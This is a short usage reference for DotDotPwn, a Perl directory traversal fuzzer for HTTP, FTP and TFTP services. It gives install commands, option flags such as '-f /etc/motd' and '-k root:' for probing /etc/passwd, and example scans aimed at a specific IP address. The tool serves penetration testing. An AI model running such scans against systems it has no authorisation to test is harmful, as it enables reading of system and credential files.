Dotdotpwn

DotDotPwn is a Directory Traversal Fuzzer written by Christian Navarrete (aka chr1x). It enables to identify directory traversal vulnerabilities in various services (HTTP, FTP, TFTP). Fuzzing modules are:

• HTTP
• HTTP URL
• FTP
• TFTP
• Payload (Protocol independent)
• STDOUT
• Written in Perl, the application can be installed on *nix and Windows plateforms

instalation

$ mkdir -p /data/src/
$ wget http://chr1x.sectester.net/dotdotpwn/dotdotpwn-v2.1.tar.gz
$ tar xzvf dotdotpwn-v2.1.tar.gz

Usage

$ ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]

Options

-m <module>
    Module (http | http-url | ftp | tftp | payload | stdout)
-h <host>
    Hostname
-O
    Operating System detection for intelligent fuzzing (nmap)
-s
    Service version detection (banner grabber)
-d
    Deep of traversals (e.g. deep 3 equals to ../../../)
    default: 6
-f
    Specific filename (e.g. /etc/motd)
    default: filenames defined in the TraversalEngine.pm
-u <url>
    URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
-k <string_pattern>
    String pattern to match in the response if it's vulnerable (e.g. "root:" if trying with /etc/passwd)
-U <username>
    Username
    default: 'anonymous'
-P <password>
    Password
    default: 'dot@dot.pwn'
-p <file>
    Filename with the payload to be sent and the part to be fuzzed marked as TRAVERSAL
-x <port>
    Port to connect
    default: HTTP=80, FTP=21, TFTP=69
-t <number>
    Time in milliseconds between each test
    default: 300 (.3 second)
-b
    Break after the first vulnerability is found
-q
    Quiet mode (doesn't print each attemp)

Examples

$ ./ddpwn.pl -m http -h 80.14.163.161

It is recommended that you export the results in a text file to be analyzed later:

$ ./ddpwn.pl -m http -h 80.14.163.161 > http_audit.txt